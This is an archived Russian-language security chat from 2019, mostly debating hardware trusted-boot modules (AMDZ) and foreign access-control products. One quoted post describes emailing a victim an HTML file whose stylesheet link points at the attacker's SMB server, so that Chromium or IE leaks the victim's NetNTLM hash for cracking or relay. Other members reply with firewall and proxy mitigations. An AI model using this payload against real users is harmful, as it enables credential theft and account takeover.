Size: a a a

Чат ruCyberSecurity

2019 July 19

S

Saches in Чат ruCyberSecurity
Роман Мылицын
К слову, ряд специалистов считает, что запад отстал от России в части технологий по защите информации
Ну да, и все воруют схемы АМДЗ, но воспрозвести не могу, отстали бедные. Да?
источник

РМ

Роман Мылицын... in Чат ruCyberSecurity
Saches
Ну да, и все воруют схемы АМДЗ, но воспрозвести не могу, отстали бедные. Да?
А как надо то, расскажите уже?
источник

Ш

Шурик in Чат ruCyberSecurity
Valeriy G.B.
а причём тут яндекс и гугл?
При том что их браузеры ломятся на самбу
источник

V

Valeriy G.B. in Чат ruCyberSecurity
Шурик
При том что их браузеры ломятся на самбу
а что в этом плохого? этой "проблеме" много лет, и решается она файрволами или иными средствами, блокирующими отправку ntlm сессии на неавторизованные хосты
источник

Ш

Шурик in Чат ruCyberSecurity
Valeriy G.B.
а что в этом плохого? этой "проблеме" много лет, и решается она файрволами или иными средствами, блокирующими отправку ntlm сессии на неавторизованные хосты
Ну вот люди переживают за тех у кого нет МЭ, и не хотят чтобы браузер без спроса отсылал ваш хеш на непонятный smb
источник

Ш

Шурик in Чат ruCyberSecurity
Спросить то можно?
источник

V

Valeriy G.B. in Чат ruCyberSecurity
может где в настройках хромиума это и отключается, через flags, но имхо переживать и не использовать МЭ, даже встроенный в винду это как хотеть выиграть лотерею и не покупать билет
источник

S

Saches in Чат ruCyberSecurity
Роман Мылицын
А как надо то, расскажите уже?
Делаем поиск, например, по measured boot / trusted boot / secure boot, и, наверное, лучше в гугле, т.к. рускоязычных статей мало.
Если обзорчик сделаете, все спасибо скажут. В каждый мобильник тоже будете предлагать АМДЗ вставить?
источник

Ш

Шурик in Чат ruCyberSecurity
РусбиТех наверно потому что любит и ценить АМДЗ и видит рынок сбыта, свернули разработку Максима
источник

I

Igor in Чат ruCyberSecurity
Saches
Вопрос - в мире достаточно много производителей самых разных СЗИ, но кроме России, АМДЗ нигде не выпускают. Вот интересно, почему?
А примеры СЗИ от НСД иностранных производителей ? )
источник

@

@Anarius in Чат ruCyberSecurity
Шурик
Доброго дня, сегодня поделюсь (вдруг кто не знает), способом заполучить netntlm сессию пользователя. По ней можно сбрутфорсить пароль, а можно и перенаправить её на какой нибудь ресурс с авторизацией через ntlm. Все очень банально просто. Нужно создать html файл с содержимым: <link rel="stylesheet" href="//адрес вашего smb сервера"> . Полученный файл отправляем "жертве" по эл. почте. Если у жертвы браузер на chromium либо ie + нет межсетевого экрана (соединения по смб в интернет не запрещены), то вы получите netntlm сессию. Бага была отправлена в google, там сказали что знают о ней 100 тысяч репортов назад. Бага была отправленя в яндекс (ибо яндекс браузер ведёт себя точно так же), яндекс решил не отвечать на письмо.  Такие вот дела, малварь не нужна чтобы заполучить пароль пользователя.
Есть мнение , что хостам  внутренней сети предприятия вообще не нужно без крайней необходимости предоставлять прямой доступ в интернет , только через прокси. В таком случае эксплуатация подобных сценариев будет затруднительна.
источник

Ш

Шурик in Чат ruCyberSecurity
@Anarius
Есть мнение , что хостам  внутренней сети предприятия вообще не нужно без крайней необходимости предоставлять прямой доступ в интернет , только через прокси. В таком случае эксплуатация подобных сценариев будет затруднительна.
Понятное дело что для каждой уязвимости можно применить меры компенсирующие ее
источник

РМ

Роман Мылицын... in Чат ruCyberSecurity
Saches
Делаем поиск, например, по measured boot / trusted boot / secure boot, и, наверное, лучше в гугле, т.к. рускоязычных статей мало.
Если обзорчик сделаете, все спасибо скажут. В каждый мобильник тоже будете предлагать АМДЗ вставить?
Надеюсь, вы не отвечаете за безопасность
источник

РМ

Роман Мылицын... in Чат ruCyberSecurity
Иначе бы понимали, почему в ряде случаев требование к амдз быть аппаратным
источник

РМ

Роман Мылицын... in Чат ruCyberSecurity
Шурик
РусбиТех наверно потому что любит и ценить АМДЗ и видит рынок сбыта, свернули разработку Максима
Там другие причины, не связанные с рынком
источник

PK

Pavel Korostelev in Чат ruCyberSecurity
Igor
А примеры СЗИ от НСД иностранных производителей ? )
Boldon james, titus, stormshield data enterprise
источник

PK

Pavel Korostelev in Чат ruCyberSecurity
Все эти решения содержат главную часть сзи от нсд - реализацию мандатного разграничения доступа
источник

РМ

Роман Мылицын... in Чат ruCyberSecurity
Pavel Korostelev
Все эти решения содержат главную часть сзи от нсд - реализацию мандатного разграничения доступа
🤗
источник

VM

Vladimir Minakov in Чат ruCyberSecurity
Роман Мылицын
Надеюсь, вы не отвечаете за безопасность
Надеюсь, не ответчает за безопасность, связанной с большими рисками РФ. Если работает в представительстве западной компании - то прав на 100% в отношении своей сферы ответственности
источник

S

Saches in Чат ruCyberSecurity
Igor
А примеры СЗИ от НСД иностранных производителей ? )
А, например, сертифицированные  ФСТЭКом средства от НСД ,  по каким РД сертифицируются?
источник